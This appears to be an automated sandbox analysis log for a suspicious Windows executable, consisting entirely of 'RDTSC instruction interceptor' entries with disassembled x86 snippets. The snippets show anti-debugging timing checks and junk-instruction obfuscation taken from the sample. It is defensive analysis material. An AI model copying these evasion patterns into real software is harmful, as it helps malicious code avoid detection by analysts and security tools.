Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9643 second address: 9C9657 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007F9899183FE6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9657 second address: 9C965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9C9A97 second address: 9C9AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jbe 00007F9899183FF4h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CA407 second address: 9CA40C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB3BA second address: 9CB3CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007F9899184000h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB3CC second address: 9CB438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F98991A2758h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 or esi, dword ptr [ebp+122D38FEh] 0x0000002a push 00000000h 0x0000002c mov si, cx 0x0000002f mov si, di 0x00000032 push 00000000h 0x00000034 mov si, bx 0x00000037 xchg eax, ebx 0x00000038 jmp 00007F98991A2763h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jns 00007F98991A2756h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CB438 second address: 9CB43E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC7DE second address: 9CC7E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC7E8 second address: 9CC841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movzx edi, di 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d mov si, DAB1h 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F9899183FE8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D1B96h] 0x00000034 xchg eax, ebx 0x00000035 jnl 00007F9899183FF9h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC841 second address: 9CC845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CC845 second address: 9CC84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD24C second address: 9CD250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD250 second address: 9CD254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CD254 second address: 9CD2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F98991A2758h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D1B40h] 0x00000027 and esi, 3E7DBF06h 0x0000002d push 00000000h 0x0000002f mov esi, edx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D2AC1h], esi 0x00000039 jc 00007F98991A275Bh 0x0000003f xor si, 427Fh 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007F98991A2758h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE894 second address: 9CE89A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE648 second address: 9CE64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE89A second address: 9CE8E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12450724h], edi 0x00000013 push 00000000h 0x00000015 mov esi, 0A736B3Ch 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F9899183FE8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 js 00007F9899183FE6h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE64E second address: 9CE658 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98991A275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE658 second address: 9CE669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9899183FE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CF0EE second address: 9CF0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE669 second address: 9CE66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A38 second address: 981A6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F98991A2760h 0x0000000f pushad 0x00000010 jmp 00007F98991A2760h 0x00000015 jnc 00007F98991A2756h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9CE66D second address: 9CE673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 981A6B second address: 981A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98991A2756h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5D8B second address: 9D5DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FF9h 0x00000009 jmp 00007F9899183FF0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5DB8 second address: 9D5DC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D5DC2 second address: 9D5DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D3DB5 second address: 9D3DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D64B8 second address: 9D6566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9899183FEFh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jno 00007F9899183FEBh 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F9899183FE8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D3360h], ebx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 or ebx, 5B315DA7h 0x0000004c mov di, 2AD8h 0x00000050 mov eax, dword ptr [ebp+122D0825h] 0x00000056 sub dword ptr [ebp+122D3326h], eax 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push esi 0x00000061 call 00007F9899183FE8h 0x00000066 pop esi 0x00000067 mov dword ptr [esp+04h], esi 0x0000006b add dword ptr [esp+04h], 0000001Bh 0x00000073 inc esi 0x00000074 push esi 0x00000075 ret 0x00000076 pop esi 0x00000077 ret 0x00000078 push ecx 0x00000079 pop ebx 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d push edx 0x0000007e jmp 00007F9899183FECh 0x00000083 pop edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D7536 second address: 9D753A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D927E second address: 9D9282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D9282 second address: 9D92EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F98991A2769h 0x00000011 sub dword ptr [ebp+124506C4h], esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F98991A2758h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov bx, si 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+12471FA0h], ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jbe 00007F98991A2756h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D92EA second address: 9D92EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D92EE second address: 9D92F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D84A5 second address: 9D84C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F9899183FE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D84C1 second address: 9D84C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA261 second address: 9DA26B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9899183FECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA26B second address: 9DA27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F98991A275Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA27C second address: 9DA280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA280 second address: 9DA286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA286 second address: 9DA28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DA28A second address: 9DA2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F98991A2758h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D3317h], esi 0x0000002a movsx eax, dx 0x0000002d popad 0x0000002e mov ebx, dword ptr [ebp+122D3886h] 0x00000034 push 00000000h 0x00000036 mov di, E392h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F98991A2758h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 push eax 0x00000057 pushad 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DB347 second address: 9DB351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9899183FE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DB3F2 second address: 9DB407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 ja 00007F98991A2756h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DC3FF second address: 9DC403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DC403 second address: 9DC407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DB52F second address: 9DB535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9834F0 second address: 9834F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9834F6 second address: 9834FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9834FB second address: 983501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DE82F second address: 9DE839 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DE839 second address: 9DE84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F98991A2756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DE84D second address: 9DE854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DF973 second address: 9DF977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DFB3E second address: 9DFB66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F9899183FF4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F9899183FE6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E1AE9 second address: 9E1AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9DEA52 second address: 9DEA58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E39A3 second address: 9E39F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F98991A275Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D1A9Dh], eax 0x00000014 push 00000000h 0x00000016 mov ebx, dword ptr [ebp+122D35B2h] 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f jng 00007F98991A275Bh 0x00000025 and cx, E804h 0x0000002a or dword ptr [ebp+122D1B4Ch], ecx 0x00000030 popad 0x00000031 add edi, 45CD1CD5h 0x00000037 xchg eax, esi 0x00000038 jmp 00007F98991A275Ch 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push edx 0x00000041 jc 00007F98991A2756h 0x00000047 pop edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E39F8 second address: 9E39FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E4A7E second address: 9E4A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E3B7F second address: 9E3C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b xor di, EF11h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F9899183FE8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, ecx 0x00000033 js 00007F9899183FF6h 0x00000039 jmp 00007F9899183FF0h 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov bx, ax 0x00000048 mov eax, dword ptr [ebp+122D0A69h] 0x0000004e jmp 00007F9899183FF7h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F9899183FE8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f call 00007F9899183FF2h 0x00000074 cmc 0x00000075 pop edi 0x00000076 mov di, dx 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F9899183FEEh 0x00000082 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E3C4F second address: 9E3C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E5C86 second address: 9E5C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E4C77 second address: 9E4C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F98991A2756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F98991A275Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E4C94 second address: 9E4C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9899183FE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9E4C9E second address: 9E4CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9F050A second address: 9F050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9F050F second address: 9F0528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2763h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9F0528 second address: 9F052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9EFCBF second address: 9EFCC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9EFCC3 second address: 9EFCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9899183FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9EFCCF second address: 9EFCE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F98991A2756h 0x0000000a jmp 00007F98991A275Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9EFF58 second address: 9EFF67 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9EFF67 second address: 9EFF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F98991A275Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F98991A2756h 0x00000014 jmp 00007F98991A2766h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9F41FA second address: 9F4208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FA052 second address: 9FA061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F98991A2756h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9FAADC second address: 9FAAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
